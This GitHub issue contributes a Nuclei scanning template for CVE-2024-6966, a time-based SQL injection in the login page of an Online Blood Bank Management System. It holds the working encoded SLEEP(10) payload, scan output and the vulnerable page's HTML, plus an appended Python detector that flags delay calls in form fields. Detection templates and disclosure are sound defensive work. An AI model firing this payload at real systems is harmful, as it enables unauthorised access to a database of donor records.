CVE-2024-6966 Online Blood Bank Management System - SQL Injection in Login Page #10393

Open
cl4irv0yance opened this issue Jul 25, 2024 · 1 comment
@cl4irv0yance

Template Information:

In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.

References can be found here:
https://nvd.nist.gov/vuln/detail/CVE-2024-6966
HermesCui/CVE#1

Nuclei Template:

id: cve-2024-6966

info:
  name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
  author: cl4irv0yance
  description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection. 
  severity: High
  reference: 
    - https://github.com/HermesCui/CVE/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: cve-2024-6966
  tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode


http:
  - raw:
      - |
        @timeout: 25s
        POST /bloodbank/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Username'
          - 'Password'
          - 'Keep me Signed in'
          - 'Forgot Password'
          - 'Wrong email or password'
        condition: and

      - type: dsl
        dsl:
          - 'duration>=10'

Template Results

nuclei -u https://test.site/bloodbank -t cve-2024-6966.yaml                                                                   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.9

                projectdiscovery.io

[INF] Current nuclei version: v3.2.9 (outdated)
[INF] Current nuclei-templates version: v9.9.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[cve-2024-6966] [http] [high] https://test.site/bloodbank/login.php

Page Response (only including html in response - snipped css)

HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 23:17:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5588
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[..SNIP..]

<div class="login-wrap">
  <div class="login-html">

  <form action="" method="post">
    <input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Login</label>
    <input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab"></label>

            <div class="login-form">
      <div class="sign-in-htm">
        <div class="group">
          <form action="home.php">
          <label for="user" class="label">Username</label>
          <input id="user" type="text" class="input" name="user">
        </div>
        <div class="group">
          <label for="pass" class="label">Password</label>
          <input id="pass" type="password" class="input" data-type="password" name="pass">
        </div>
        <div class="group">
          <input id="check" type="checkbox" class="check" checked>
          <label for="check"><span class="icon"></span> Keep me Signed in</label>
        </div>
        <div class="group">
          <input type="submit" style="background-color: green; color: white" class="button" name="sub" value="Log In">
        </div>
          <div class="group">
            <a href="forgot.php">Forgot Password</a>


        

      <script>alert('Wrong email or password')</script>      	<div class="footer-left">
				<h3></span></h3>
				
             <div class="hr"></div>
        <div class="foot-lnk">
          <a href="forgot.html"></a>
        </div>
      </div>
cl4irv0yance added the nuclei-template (Nuclei template contribution) label Jul 25, 2024
cl4irv0yance added a commit to cl4irv0yance/nuclei-templates that referenced this issue Jul 26, 2024
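
A server-side check for the request this template sends, as an added example (not part of the issue or of the nuclei-templates project): it decodes a form-encoded login body and flags MySQL/MariaDB delay calls in the `user` field. The function names and the benign sample body are assumptions made for illustration; the first body is the one from the template above.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Request body copied from the template's raw request on this page.
TEMPLATE_BODY = (
    "tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+"
    "%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj"
    "%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In"
)
# Constructed benign login (a username with an apostrophe) for comparison.
BENIGN_BODY = "tab=on&user=o%27brien&pass=test&sub=Log+In"

# MySQL/MariaDB delay primitives followed by an opening parenthesis.
DELAY_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # bound repeated decoding of nested encodings


def fully_decode(value: str) -> str:
    """URL-decode repeatedly until the value stops changing (bounded)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_delay_injection(body: str, fields=("user",)) -> list[dict]:
    """Return one finding per watched form field that carries a delay call."""
    findings = []
    # parse_qsl performs the first round of decoding, as the web server would.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in fields:
            continue
        decoded = fully_decode(value)
        match = DELAY_CALL.search(decoded)
        if match:
            findings.append({
                "field": name,
                "function": match.group(1).upper(),
                "breaks_quote": "'" in decoded,  # value leaves the string literal
                "decoded": decoded,
            })
    return findings
```

The decoded `user` value also shows that the template's payload embeds a second, URL-encoded copy of the form body (`tab=on&user=...&pass=123123&sub=Log In"`), which the server receives as part of the username string.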
@princechaddha
Member

Hello, the response time for this issue was longer than usual because the team was traveling for DEFCON. The team will respond to this issue shortly. Thank you for your contribution.
